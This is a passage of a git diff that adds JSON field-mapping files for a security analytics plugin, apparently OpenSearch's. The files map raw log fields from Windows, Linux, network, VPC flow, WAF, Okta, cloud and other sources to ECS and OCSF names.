"raw_field":"creationTime", + "ecs":"timestamp", + "ocsf": "unmapped.creationTime" + } + ] +} diff --git a/bin/main/OSMapping/github_logtype.json b/bin/main/OSMapping/github_logtype.json new file mode 100644 index 000000000..31ec6ee59 --- /dev/null +++ b/bin/main/OSMapping/github_logtype.json @@ -0,0 +1,12 @@ +{ + "name": "github", + "description": "Github Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"action", + "ecs":"github.action" + } + ] +} diff --git a/bin/main/OSMapping/gworkspace_logtype.json b/bin/main/OSMapping/gworkspace_logtype.json new file mode 100644 index 000000000..7c5766895 --- /dev/null +++ b/bin/main/OSMapping/gworkspace_logtype.json @@ -0,0 +1,20 @@ +{ + "name": "gworkspace", + "description": "GWorkspace Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"eventSource", + "ecs":"google_workspace.admin.service.name" + }, + { + "raw_field":"eventName", + "ecs":"google_workspace.event.name" + }, + { + "raw_field":"new_value", + "ecs":"google_workspace.admin.new_value" + } + ] +} diff --git a/bin/main/OSMapping/linux_logtype.json b/bin/main/OSMapping/linux_logtype.json new file mode 100644 index 000000000..5b77de6b3 --- /dev/null +++ b/bin/main/OSMapping/linux_logtype.json @@ -0,0 +1,64 @@ +{ + "name": "linux", + "description": "Linux Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"name", + "ecs":"user.filesystem.name" + }, + { + "raw_field":"a0", + "ecs":"auditd.log.a0" + }, + { + "raw_field":"comm", + "ecs":"auditd.log.comm" + }, + { + "raw_field":"exe", + "ecs":"auditd.log.exe" + }, + { + "raw_field":"uid", + "ecs":"auditd.log.uid" + }, + { + "raw_field":"USER", + "ecs":"system.auth.user" + }, + { + "raw_field":"User", + "ecs":"system.auth.user" + }, + { + "raw_field":"Image", + "ecs":"process.exe" + }, + { + "raw_field":"DestinationHostname", + "ecs":"rsa.web.remote_domain" + }, + { + "raw_field":"CommandLine", + "ecs":"process.command_line" + }, + { + "raw_field":"ParentImage", + "ecs":"process.parent.executable" + }, + { + "raw_field":"CurrentDirectory", + "ecs":"process.working_directory" + }, + { + "raw_field":"LogonId", + "ecs":"process.real_user.id" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/logtypes.json b/bin/main/OSMapping/logtypes.json new file mode 100644 index 000000000..30aa32a44 --- /dev/null +++ b/bin/main/OSMapping/logtypes.json @@ -0,0 +1,209 @@ +{ + "others_application": { + "name": "others_application", + "description": "Application logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 0 + } + }, + "others_apt": { + "name": "others_apt", + "description": "Apt logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 1 + } + }, + "others_cloud": { + "name": "others_cloud", + "description": "Cloud logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 2 + } + }, + "others_compliance": { + "name": "others_compliance", + "description": "Compliance logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 4 + } + }, + "linux": { + "name": "linux", + "description": "Sys logs", + "category": "System Activity", + "source": "Sigma", + "tags": { + "correlation_id": 5 + } + }, + "others_macos": { + "name": "others_macos", + "description": "MacOS logs", + "category": "System Activity", + "source": "Sigma", + "tags": { + "correlation_id": 6 + } + }, + "network": { + "name": "network", + "description": "Network logs", + "category": "Network Activity", + "source": "Sigma", + "tags": { + "correlation_id": 7 + } + }, + "others_proxy": { + "name": "others_proxy", + "description": "Proxy logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 8 + } + }, + "others_web": { + "name": "others_web", + "description": "Web logs", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 9 + } + }, + "windows": { + "name": "windows", + "description": "Windows logs", + "category": "System Activity", + "source": "Sigma", + "tags": { + "correlation_id": 10 + } + }, + "ad_ldap": { + "name": "ad_ldap", + "description": "Ad/ldap logs", + "category": "Access Management", + "source": "Sigma", + "tags": { + "correlation_id": 11 + } + }, + "apache_access": { + "name": "apache_access", + "description": "Apache Access logs", + "category": "Access Management", + "source": "Sigma", + "tags": { + "correlation_id": 12 + } + }, + "cloudtrail": { + "name": "cloudtrail", + "description": "Cloudtrail Raw or OCSF based logs", + "category": "Cloud Services", + "source": "Sigma", + "tags": { + "correlation_id": 14 + } + }, + "dns": { + "name": "dns", + "description": "DNS Raw or Route53 OCSF based logs", + "category": "Network Activity", + "source": "Sigma", + "tags": { + "correlation_id": 15 + } + }, + "github": { + "name": "github", + "description": "Github logs", + "category": "Applications", + "source": "Sigma", + "tags": { + "correlation_id": 16 + } + }, + "m365": { + "name": "m365", + "description": "M365 logs", + "category": "Applications", + "source": "Sigma", + "tags": { + "correlation_id": 17 + } + }, + "gworkspace": { + "name": "gworkspace", + "description": "GWorkspace logs", + "category": "Applications", + "source": "Sigma", + "tags": { + "correlation_id": 18 + } + }, + "okta": { + "name": "okta", + "description": "Okta logs", + "category": "Access Management", + "source": "Sigma", + "tags": { + "correlation_id": 19 + } + }, + "azure": { + "name": "azure", + "description": "Azure logs", + "category": "Cloud Services", + "source": "Sigma", + "tags": { + "correlation_id": 20 + } + }, + "s3": { + "name": "s3", + "description": "S3 logs", + "category": "Cloud Services", + "source": "Sigma", + "tags": { + "correlation_id": 21 + } + }, + "test_windows": { + "name": "test_windows", + "description": "Test Windows Log Type for integ tests. Please do not use.", + "category": "Other", + "source": "Sigma", + "tags": { + "correlation_id": 22 + } + }, + "vpcflow": { + "name": "vpcflow", + "description": "VPC Flow Raw or OCSF based logs", + "category": "Network Activity", + "source": "Sigma", + "tags": { + "correlation_id": 23 + } + }, + "waf": { + "name": "waf", + "description": "Web Application Firewall based logs", + "category": "Security", + "source": "Sigma", + "tags": { + "correlation_id": 24 + } + } +} diff --git a/bin/main/OSMapping/m365_logtype.json b/bin/main/OSMapping/m365_logtype.json new file mode 100644 index 000000000..e19c2418e --- /dev/null +++ b/bin/main/OSMapping/m365_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "m365", + "description": "Microsoft 365 Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"eventSource", + "ecs":"rsa.misc.event_source" + }, + { + "raw_field":"eventName", + "ecs":"rsa.misc.event_desc" + }, + { + "raw_field":"status", + "ecs":"rsa.misc.status" + }, + { + "raw_field":"Payload", + "ecs":"rsa.misc.payload_dst" + } + ] +} diff --git a/bin/main/OSMapping/netflow_logtype.json b/bin/main/OSMapping/netflow_logtype.json new file mode 100644 index 000000000..9dc015198 --- /dev/null +++ b/bin/main/OSMapping/netflow_logtype.json @@ -0,0 +1,44 @@ +{ + "name": "netflow", + "description": "Netflow Log Type used only in Integration Tests", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": [ + "destination.ip", + "source.ip" + ] + } + ], + "mappings":[ + { + "raw_field":"netflow.source_ipv4_address", + "ecs":"source.ip" + }, + { + "raw_field":"netflow.source_transport_port", + "ecs":"source.port" + }, + { + "raw_field":"netflow.destination_ipv4_address", + "ecs":"destination.ip" + }, + { + "raw_field":"netflow.destination_transport_port", + "ecs":"destination.port" + }, + { + "raw_field":"http.request.method", + "ecs":"http.request.method" + }, + { + "raw_field":"http.response.status_code", + "ecs":"http.response.status_code" + }, + { + "raw_field":"timestamp", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/network_logtype.json b/bin/main/OSMapping/network_logtype.json new file mode 100644 index 000000000..2ca92a1ad --- /dev/null +++ b/bin/main/OSMapping/network_logtype.json @@ -0,0 +1,144 @@ +{ + "name": "network", + "description": "Network Log Type", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": [ + "destination.ip", + "source.ip" + ] + } + ], + "mappings":[ + { + "raw_field":"action", + "ecs":"netflow.firewall_event" + }, + { + "raw_field":"certificate.serial", + "ecs":"zeek.x509.certificate.serial" + }, + { + "raw_field":"name", + "ecs":"zeek.smb_files.name" + }, + { + "raw_field":"path", + "ecs":"zeek.smb_files.path" + }, + { + "raw_field":"dst_port", + "ecs":"destination.port" + }, + { + "raw_field":"qtype_name", + "ecs":"zeek.dns.qtype_name" + }, + { + "raw_field":"operation", + "ecs":"zeek.dce_rpc.operation" + }, + { + "raw_field":"endpoint", + "ecs":"zeek.dce_rpc.endpoint" + }, + { + "raw_field":"zeek.dce_rpc.endpoint", + "ecs":"zeek.dce_rpc.endpoint" + }, + { + "raw_field":"answers", + "ecs":"zeek.dns.answers" + }, + { + "raw_field":"query", + "ecs":"zeek.dns.query" + }, + { + "raw_field":"client_header_names", + "ecs":"zeek.http.client_header_names" + }, + { + "raw_field":"resp_mime_types", + "ecs":"zeek.http.resp_mime_types" + }, + { + "raw_field":"cipher", + "ecs":"zeek.kerberos.cipher" + }, + { + "raw_field":"request_type", + "ecs":"zeek.kerberos.request_type" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + }, + { + "raw_field":"method", + "ecs":"http.request.method" + }, + { + "raw_field":"id.resp_p", + "ecs":"id.resp_p" + }, + { + "raw_field":"blocked", + "ecs":"blocked-flag" + }, + { + "raw_field":"id.orig_h", + "ecs":"id.orig_h" + }, + { + "raw_field":"Z", + "ecs":"Z-flag" + }, + { + "raw_field":"id.resp_h", + "ecs":"id.resp_h" + }, + { + "raw_field":"uri", + "ecs":"url.path" + }, + { + "raw_field":"c-uri", + "ecs":"url.path" + }, + { + "raw_field":"c-useragent", + "ecs":"user_agent.name" + }, + { + "raw_field":"status_code", + "ecs":"http.response.status_code" + }, + { + "raw_field":"rejected", + "ecs":"rejected" + }, + { + "raw_field":"dst_ip", + "ecs":"destination.ip" + }, + { + "raw_field":"src_ip", + "ecs":"source.ip" + }, + { + "raw_field":"user_agent", + "ecs":"user_agent.name" + }, + { + "raw_field":"request_body_len", + "ecs":"http.request.body.bytes" + }, + { + "raw_field":"service", + "ecs":"service" + } + ] +} diff --git a/bin/main/OSMapping/okta_logtype.json b/bin/main/OSMapping/okta_logtype.json new file mode 100644 index 000000000..e73a0c273 --- /dev/null +++ b/bin/main/OSMapping/okta_logtype.json @@ -0,0 +1,16 @@ +{ + "name": "okta", + "description": "Okta Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"eventtype", + "ecs":"okta.event_type" + }, + { + "raw_field":"displaymessage", + "ecs":"okta.display_message" + } + ] +} diff --git a/bin/main/OSMapping/others_application_logtype.json b/bin/main/OSMapping/others_application_logtype.json new file mode 100644 index 000000000..4008602d4 --- /dev/null +++ b/bin/main/OSMapping/others_application_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_application", + "description": "others_application", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_apt_logtype.json b/bin/main/OSMapping/others_apt_logtype.json new file mode 100644 index 000000000..1a4ca711f --- /dev/null +++ b/bin/main/OSMapping/others_apt_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_apt", + "description": "others_apt", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_cloud_logtype.json b/bin/main/OSMapping/others_cloud_logtype.json new file mode 100644 index 000000000..64cbc7935 --- /dev/null +++ b/bin/main/OSMapping/others_cloud_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_cloud", + "description": "others_cloud", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_compliance_logtype.json b/bin/main/OSMapping/others_compliance_logtype.json new file mode 100644 index 000000000..6e065795a --- /dev/null +++ b/bin/main/OSMapping/others_compliance_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_compliance", + "description": "others_compliance", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_macos_logtype.json b/bin/main/OSMapping/others_macos_logtype.json new file mode 100644 index 000000000..6b6452100 --- /dev/null +++ b/bin/main/OSMapping/others_macos_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_macos", + "description": "others_macos", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_proxy_logtype.json b/bin/main/OSMapping/others_proxy_logtype.json new file mode 100644 index 000000000..a2b0794a4 --- /dev/null +++ b/bin/main/OSMapping/others_proxy_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_proxy", + "description": "others_proxy", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/others_web_logtype.json b/bin/main/OSMapping/others_web_logtype.json new file mode 100644 index 000000000..b46adc6a4 --- /dev/null +++ b/bin/main/OSMapping/others_web_logtype.json @@ -0,0 +1,24 @@ +{ + "name": "others_web", + "description": "others_web", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type" + }, + { + "raw_field":"query", + "ecs":"dns.question.name" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/s3_logtype.json b/bin/main/OSMapping/s3_logtype.json new file mode 100644 index 000000000..20c896df6 --- /dev/null +++ b/bin/main/OSMapping/s3_logtype.json @@ -0,0 +1,20 @@ +{ + "name": "s3", + "description": "S3 Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"eventName", + "ecs":"aws.cloudtrail.event_name" + }, + { + "raw_field":"eventSource", + "ecs":"aws.cloudtrail.event_source" + }, + { + "raw_field":"eventTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/test_windows_logtype.json b/bin/main/OSMapping/test_windows_logtype.json new file mode 100644 index 000000000..cc619c5a1 --- /dev/null +++ b/bin/main/OSMapping/test_windows_logtype.json @@ -0,0 +1,53 @@ +{ + "name": "test_windows", + "description": "Test Log Type used by tests. It is created as a lightweight log type for integration tests", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": ["HostName"] + } + ], + "mappings": [ + { + "raw_field":"EventID", + "ecs":"event_uid" + }, + { + "raw_field":"HiveName", + "ecs":"unmapped.HiveName" + }, + { + "raw_field":"fieldB", + "ecs":"mappedB" + }, + { + "raw_field":"fieldA1", + "ecs":"mappedA" + }, + { + "raw_field":"CommandLine", + "ecs":"windows-event_data-CommandLine" + }, + { + "raw_field":"HostName", + "ecs":"windows-hostname" + }, + { + "raw_field":"Message", + "ecs":"windows-message" + }, + { + "raw_field":"Provider_Name", + "ecs":"windows-provider-name" + }, + { + "raw_field":"ServiceName", + "ecs":"windows-servicename" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + } + ] +} diff --git a/bin/main/OSMapping/vpcflow_logtype.json b/bin/main/OSMapping/vpcflow_logtype.json new file mode 100644 index 000000000..29d9f38c2 --- /dev/null +++ b/bin/main/OSMapping/vpcflow_logtype.json @@ -0,0 +1,141 @@ +{ + "name": "vpcflow", + "description": "VPC Flow Log Type", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": [ + "dst_endpoint.ip", + "src_endpoint.ip" + ] + } + ], + "mappings":[ + { + "raw_field":"version", + "ecs":"netflow.version", + "ocsf": "metadata.product.version" + }, + { + "raw_field":"account_id", + "ecs":"netflow.account_id", + "ocsf": "cloud.account_uid" + }, + { + "raw_field":"region", + "ecs":"netflow.region", + "ocsf": "cloud.region" + }, + { + "raw_field":"az_id", + "ecs":"netflow.az_id", + "ocsf": "cloud.zone" + }, + { + "raw_field":"srcport", + "ecs":"netflow.srcport", + "ocsf": "src_endpoint.port" + }, + { + "raw_field":"dstport", + "ecs":"netflow.dstport", + "ocsf": "dst_endpoint.port" + }, + { + "raw_field":"protocol", + "ecs":"netflow.protocol", + "ocsf": "connection_info.protocol_num" + }, + { + "raw_field":"packets", + "ecs":"netflow.packets", + "ocsf": "traffic.packets" + }, + { + "raw_field":"bytes", + "ecs":"netflow.bytes", + "ocsf": "traffic.bytes" + }, + { + "raw_field":"end", + "ecs":"netflow.end", + "ocsf": "end_time" + }, + { + "raw_field":"tcp_flags", + "ecs":"netflow.tcp_flags", + "ocsf": "connection_info.tcp_flags" + }, + { + "raw_field":"protocol_ver", + "ecs":"netflow.protocol_ver", + "ocsf": "connection_info.protocol_ver" + }, + { + "raw_field":"pkt_src_aws_service", + "ecs":"netflow.pkt_src_aws_service", + "ocsf": "src_endpoint.svc_name" + }, + { + "raw_field":"pkt_dst_aws_service", + "ecs":"netflow.pkt_dst_aws_service", + "ocsf": "dst_endpoint.svc_name" + }, + { + "raw_field":"log_status", + "ecs":"netflow.log_status", + "ocsf": "status_code" + }, + { + "raw_field":"action", + "ecs":"netflow.action", + "ocsf": "disposition_id" + }, + { + "raw_field":"traffic_path", + "ecs":"netflow.traffic_path", + "ocsf": "boundary_id" + }, + { + "raw_field":"flow_direction", + "ecs":"netflow.flow_direction", + "ocsf": "connection_info.direction_id" + }, + { + "raw_field":"dstaddr", + "ecs":"netflow.dstaddr", + "ocsf": "dst_endpoint.ip" + }, + { + "raw_field":"srcaddr", + "ecs":"netflow.srcaddr", + "ocsf": "src_endpoint.ip" + }, + { + "raw_field":"interface_id", + "ecs":"netflow.interface_id", + "ocsf": "dst_endpoint.interface_uid" + }, + { + "raw_field":"vpc_id", + "ecs":"netflow.vpc_id", + "ocsf": "dst_endpoint.vpc_uid" + }, + { + "raw_field":"instance_id", + "ecs":"netflow.instance_id", + "ocsf": "dst_endpoint.instance_uid" + }, + { + "raw_field":"subnet_id", + "ecs":"netflow.subnet_id", + "ocsf": "dst_endpoint.subnet_uid" + }, + { + "raw_field":"start", + "ecs":"timestamp", + "ocsf": "time" + } + ] +} diff --git a/bin/main/OSMapping/waf_logtype.json b/bin/main/OSMapping/waf_logtype.json new file mode 100644 index 000000000..3e5b1f4f1 --- /dev/null +++ b/bin/main/OSMapping/waf_logtype.json @@ -0,0 +1,56 @@ +{ + "name": "waf", + "description": "Web Application Firewall Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"cs-method", + "ecs":"waf.request.method" + }, + { + "raw_field":"httpRequest.httpMethod", + "ecs":"waf.request.method" + }, + { + "raw_field":"cs-uri-query", + "ecs":"waf.request.uri_query" + }, + { + "raw_field":"httpRequest.uri", + "ecs":"waf.request.uri_query" + }, + { + "raw_field":"httpRequest.args", + "ecs":"waf.request.uri_query" + }, + { + "raw_field":"cs-user-agent", + "ecs":"waf.request.headers.user_agent" + }, + { + "raw_field":"httpRequest.headers", + "ecs":"waf.request.headers" + }, + { + "raw_field":"sc-status", + "ecs":"waf.response.code" + }, + { + "raw_field":"responseCodeSent", + "ecs":"waf.response.code" + }, + { + "raw_field":"timestamp", + "ecs":"timestamp" + }, + { + "raw_field":"httpRequest.headers.value", + "ecs":"waf.request.headers.value" + }, + { + "raw_field":"httpRequest.headers.name", + "ecs":"waf.request.headers.name" + } + ] +} diff --git a/bin/main/OSMapping/windows_logtype.json b/bin/main/OSMapping/windows_logtype.json new file mode 100644 index 000000000..ec9b3ed1a --- /dev/null +++ b/bin/main/OSMapping/windows_logtype.json @@ -0,0 +1,841 @@ +{ + "name": "windows", + "description": "Windows Log Type", + "is_builtin": true, + "ioc_fields" : [ + { + "ioc": "ip", + "fields": ["destination.ip","source.ip"] + } + ], + "mappings": [ + { + "raw_field":"AccountName", + "ecs":"winlog.computerObject.name" + }, + { + "raw_field":"AuthenticationPackageName", + "ecs":"winlog.event_data.AuthenticationPackageName" + }, + { + "raw_field":"Channel", + "ecs":"winlog.channel" + }, + { + "raw_field":"Company", + "ecs":"winlog.event_data.Company" + }, + { + "raw_field":"ComputerName", + "ecs":"winlog.computer_name" + }, + { + "raw_field":"Description", + "ecs":"winlog.event_data.Description" + }, + { + "raw_field":"Details", + "ecs":"winlog.event_data.Detail" + }, + { + "raw_field":"Device", + "ecs":"winlog.event_data.Device" + }, + { + "raw_field":"FileName", + "ecs":"winlog.event_data.FileName" + }, + { + "raw_field":"FileVersion", + "ecs":"winlog.event_data.FileVersion" + }, + { + "raw_field":"IntegrityLevel", + "ecs":"winlog.event_data.IntegrityLevel" + }, + { + "raw_field":"IpAddress", + "ecs":"winlog.event_data.IpAddress" + }, + { + "raw_field":"KeyLength", + "ecs":"winlog.event_data.KeyLength" + }, + { + "raw_field":"Keywords", + "ecs":"winlog.keywords" + }, + { + "raw_field":"LogonId", + "ecs":"winlog.event_data.LogonId" + }, + { + "raw_field":"LogonProcessName", + "ecs":"winlog.event_data.LogonProcessName" + }, + { + "raw_field":"LogonType", + "ecs":"winlog.event_data.LogonType" + }, + { + "raw_field":"OriginalFilename", + "ecs":"winlog.event_data.OriginalFileName" + }, + { + "raw_field":"Path", + "ecs":"winlog.event_data.Path" + }, + { + "raw_field":"PrivilegeList", + "ecs":"winlog.event_data.PrivilegeList" + }, + { + "raw_field":"ProcessId", + "ecs":"winlog.event_data.ProcessId" + }, + { + "raw_field":"Product", + "ecs":"winlog.event_data.Product" + }, + { + "raw_field":"Provider", + "ecs":"winlog.provider_name" + }, + { + "raw_field":"ProviderName", + "ecs":"winlog.provider_name" + }, + { + "raw_field":"ScriptBlockText", + "ecs":"winlog.event_data.ScriptBlockText" + }, + { + "raw_field":"ServerName", + "ecs":"winlog.event_data.TargetServerName" + }, + { + "raw_field":"Service", + "ecs":"winlog.event_data.ServiceName" + }, + { + "raw_field":"Signed", + "ecs":"winlog.event_data.Signed" + }, + { + "raw_field":"State", + "ecs":"winlog.event_data.State" + }, + { + "raw_field":"Status", + "ecs":"winlog.event_data.Status" + }, + { + "raw_field":"SubjectDomainName", + "ecs":"winlog.event_data.SubjectDomainName" + }, + { + "raw_field":"SubjectLogonId", + "ecs":"winlog.event_data.SubjectLogonId" + }, + { + "raw_field":"SubjectUserName", + "ecs":"winlog.event_data.SubjectUserName" + }, + { + "raw_field":"SubjectUserSid", + "ecs":"winlog.event_data.SubjectUserSid" + }, + { + "raw_field":"TargetLogonId", + "ecs":"winlog.event_data.TargetLogonId" + }, + { + "raw_field":"TargetName", + "ecs":"winlog.event_data.TargetUserName" + }, + { + "raw_field":"TargetServerName", + "ecs":"winlog.event_data.TargetServerName" + }, + { + "raw_field":"TargetUserName", + "ecs":"winlog.event_data.TargetUserName" + }, + { + "raw_field":"TargetUserSid", + "ecs":"winlog.event_data.TargetUserSid" + }, + { + "raw_field":"TaskName", + "ecs":"winlog.task" + }, + { + "raw_field":"Type", + "ecs":"winlog.user.type" + }, + { + "raw_field":"User", + "ecs":"winlog.user.name" + }, + { + "raw_field":"UserName", + "ecs":"winlog.user.name" + }, + { + "raw_field":"Workstation", + "ecs":"winlog.event_data.Workstation" + }, + { + "raw_field":"WorkstationName", + "ecs":"winlog.event_data.Workstation" + }, + { + "raw_field":"event_uid", + "ecs":"winlog.event_id" + }, + { + "raw_field":"CommandLine", + "ecs":"process.command_line" + }, + { + "raw_field":"hostname", + "ecs":"host.hostname" + }, + { + "raw_field":"message", + "ecs":"windows.message" + }, + { + "raw_field":"Provider_Name", + "ecs":"winlog.provider_name" + }, + { + "raw_field":"EventId", + "ecs":"winlog.event_id" + }, + { + "raw_field":"processPath", + "ecs":"winlog.event_data.ProcessPath" + }, + { + "raw_field":"ProcessName", + "ecs":"winlog.event_data.ProcessName" + }, + { + "raw_field":"ObjectName", + "ecs":"winlog.computerObject.name" + }, + { + "raw_field":"param1", + "ecs":"winlog.event_data.param1" + }, + { + "raw_field":"param2", + "ecs":"winlog.event_data.param2" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + }, + { + "raw_field":"Origin", + "ecs":"winlog.event_data.Origin" + }, + { + "raw_field":"ParentImage", + "ecs":"winlog.event_data.ParentImage" + }, + { + "raw_field":"TargetPort", + "ecs":"winlog.event_data.TargetPort" + }, + { + "raw_field":"Query", + "ecs":"winlog.event_data.Query" + }, + { + "raw_field":"DestinationPort", + "ecs":"destination.port" + }, + { + "raw_field":"StartAddress", + "ecs":"winlog.event_data.StartAddress" + }, + { + "raw_field":"TicketOptions", + "ecs":"winlog.event_data.TicketOptions" + }, + { + "raw_field":"ParentCommandLine", + "ecs":"winlog.event_data.ParentCommandLine" + }, + { + "raw_field":"AllowedToDelegateTo", + "ecs":"winlog.event_data.AllowedToDelegateTo" + }, + { + "raw_field":"HostApplication", + "ecs":"winlog.event_data.HostApplication" + }, + { + "raw_field":"AccessMask", + "ecs":"winlog.event_data.AccessMask" + }, + { + "raw_field":"Hashes", + "ecs":"winlog.event_data.Hashes" + }, + { + "raw_field":"SidHistory", + "ecs":"winlog.event_data.SidHistory" + }, + { + "raw_field":"Initiated", + "ecs":"winlog.event_data.Initiated" + }, + { + "raw_field":"DestinationIp", + "ecs":"destination.ip" + }, + { + "raw_field":"RelativeTargetName", + "ecs":"winlog.event_data.RelativeTargetName" + }, + { + "raw_field":"Source_Name", + "ecs":"winlog.event_data.Source_Name" + }, + { + "raw_field":"AttributeLDAPDisplayName", + "ecs":"winlog.event_data.AttributeLDAPDisplayName" + }, + { + "raw_field":"DeviceDescription", + "ecs":"winlog.event_data.DeviceDescription" + }, + { + "raw_field":"AttributeValue", + "ecs":"winlog.event_data.AttributeValue" + }, + { + "raw_field":"ObjectValueName", + "ecs":"winlog.event_data.ObjectValueName" + }, + { + "raw_field":"QueryStatus", + "ecs":"winlog.event_data.QueryStatus" + }, + { + "raw_field":"TargetParentProcessId", + "ecs":"winlog.event_data.TargetParentProcessId" + }, + { + "raw_field":"OldUacValue", + "ecs":"winlog.event_data.OldUacValue" + }, + { + "raw_field":"FailureCode", + "ecs":"winlog.event_data.FailureCode" + }, + { + "raw_field":"OldTargetUserName", + "ecs":"winlog.event_data.OldTargetUserName" + }, + { + "raw_field":"NewUacValue", + "ecs":"winlog.event_data.NewUacValue" + }, + { + "raw_field":"ServiceName", + "ecs":"winlog.event_data.ServiceName" + }, + { + "raw_field":"Imphash", + "ecs":"winlog.event_data.Imphash" + }, + { + "raw_field":"NewValue", + "ecs":"winlog.event_data.NewValue" + }, + { + "raw_field":"Action", + "ecs":"winlog.event_data.Action" + }, + { + "raw_field":"SourceImage", + "ecs":"winlog.event_data.SourceImage" + }, + { + "raw_field":"QNAME", + "ecs":"winlog.event_data.QNAME" + }, + { + "raw_field":"Properties", + "ecs":"winlog.event_data.Properties" + }, + { + "raw_field":"AuditPolicyChanges", + "ecs":"winlog.event_data.AuditPolicyChanges" + }, + { + "raw_field":"Accesses", + "ecs":"winlog.event_data.Accesses" + }, + { + "raw_field":"ClassName", + "ecs":"winlog.event_data.ClassName" + }, + { + "raw_field":"ObjectClass", + "ecs":"winlog.event_data.ObjectClass" + }, + { + "raw_field":"PipeName", + "ecs":"winlog.event_data.PipeName" + }, + { + "raw_field":"HiveName", + "ecs":"winlog.event_data.HiveName" + }, + { + "raw_field":"StartModule", + "ecs":"winlog.event_data.StartModule" + }, + { + "raw_field":"HostVersion", + "ecs":"winlog.event_data.HostVersion" + }, + { + "raw_field":"DestinationHostname", + "ecs":"winlog.event_data.DestinationHostname" + }, + { + "raw_field":"QueryName", + "ecs":"winlog.event_data.QueryName" + }, + { + "raw_field":"RemoteName", + "ecs":"winlog.event_data.RemoteName" + }, + { + "raw_field":"PasswordLastSet", + "ecs":"winlog.event_data.PasswordLastSet" + }, + { + "raw_field":"ErrorCode", + "ecs":"winlog.event_data.ErrorCode" + }, + { + "raw_field":"AccessList", + "ecs":"winlog.event_data.AccessList" + }, + { + "raw_field":"Address", + "ecs":"winlog.event_data.Address" + }, + { + "raw_field":"PossibleCause", + "ecs":"winlog.event_data.PossibleCause" + }, + { + "raw_field":"DestPort", + "ecs":"destination.port" + }, + { + "raw_field":"Image", + "ecs":"winlog.event_data.Image" + }, + { + "raw_field":"CertThumbprint", + "ecs":"winlog.event_data.CertThumbprint" + }, + { + "raw_field":"TicketEncryptionType", + "ecs":"winlog.event_data.TicketEncryptionType" + }, + { + "raw_field":"ServiceType", + "ecs":"winlog.event_data.ServiceType" + }, + { + "raw_field":"ObjectServer", + "ecs":"winlog.event_data.ObjectServer" + }, + { + "raw_field":"ImagePath", + 